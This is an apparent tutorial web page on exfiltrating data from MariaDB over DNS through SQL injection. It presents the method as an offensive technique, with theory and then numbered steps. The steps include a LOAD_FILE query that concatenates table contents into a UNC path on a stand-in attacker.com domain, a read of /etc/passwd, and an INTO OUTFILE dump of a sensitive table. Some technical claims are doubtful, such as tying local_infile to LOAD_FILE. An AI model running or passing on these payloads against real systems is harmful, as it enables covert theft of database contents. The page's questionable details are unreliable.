MariaDB DNS Exfiltration

Context

In the realm of offensive cybersecurity, extracting data covertly using SQL injection vulnerabilities is a critical technique. This guide explores DNS-based data exfiltration using MariaDB, leveraging these specific vulnerabilities. By understanding and utilizing DNS leaks and the LOAD_FILE function, you can manipulate DNS resolution processes to extract sensitive information.

Theory

DNS Leak in MariaDB

DNS leaks occur when sensitive data is transmitted over external DNS queries, often to an attacker-controlled server. In MariaDB, this can be exploited by utilizing its inherent functionality to resolve DNS names, which inadvertently allows data exfiltration. By crafting specific SQL queries, attackers can trigger this name resolution to facilitate data leakage.

Load_File OOB Technique

The LOAD_FILE SQL function in MariaDB is designed to read files from the server's filesystem. An attacker can exploit this function through SQL injection to read sensitive files and leak information outside the intended environment. By executing an out-of-band (OOB) attack, data can be sent to an attacker-controlled DNS server through crafted DNS queries that utilize this function.

Name Resolution in SQL Injection

SQL injection vulnerabilities can be manipulated to control which queries the database executes. By injecting SQL code that includes DNS queries, attackers can force the database to perform DNS lookups that encode sensitive data, enabling its exfiltration. This technique manipulates normal database behavior to achieve unauthorized data access.

DNS Callback Mechanism

The DNS callback mechanism involves encoding data within DNS queries and sending these queries to an attacker's domain. This technique takes advantage of how DNS requests inherently travel through network firewalls, allowing data to bypass security controls discreetly. The sophisticated encoding of SQL data into DNS queries makes it an effective method for data exfiltration.

Practice

DNS-based Data Exfiltration via SQL Injection

To effectively exfiltrate data using DNS-based methods via SQL injection, follow these steps:

  1. Inject SQL to Trigger DNS Resolution
    Execute a SQL command that exploits the LOAD_FILE function to include data from a database table as part of a DNS query to an attacker's domain:

    SELECT LOAD_FILE(CONCAT('\\\\', (SELECT data FROM sensitive_table), '.attacker.com\\'));

    This command causes the server to attempt to resolve a DNS name constructed from the data.

  2. Enable Local File Loading Ensure local file loading is active to facilitate the use of LOAD_FILE:

    SET GLOBAL local_infile=1;

  3. Read Sensitive File This step demonstrates reading a critical file, like /etc/passwd, using SQL:

    SELECT LOAD_FILE('/etc/passwd');

    While this command itself does not directly exfiltrate data via DNS, it shows accessing sensitive files.

  4. Write Data to a File for Exfiltration To prepare data for DNS-based exfiltration, you might first write data to a local file:

    SELECT * FROM sensitive_table INTO OUTFILE '/var/lib/mysql-files/output.txt';

    Writing data to a file can be a preliminary step before attempting to extract it.

The outcome involves successful extraction of sensitive data via DNS queries to an attacker's server, bypassing traditional network protections.

Tools

  • dig
  • tcpdump
  • Wireshark

Employ these tools to capture and analyze DNS traffic, ensuring you can diagnose and verify the exfiltration process as it occurs.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.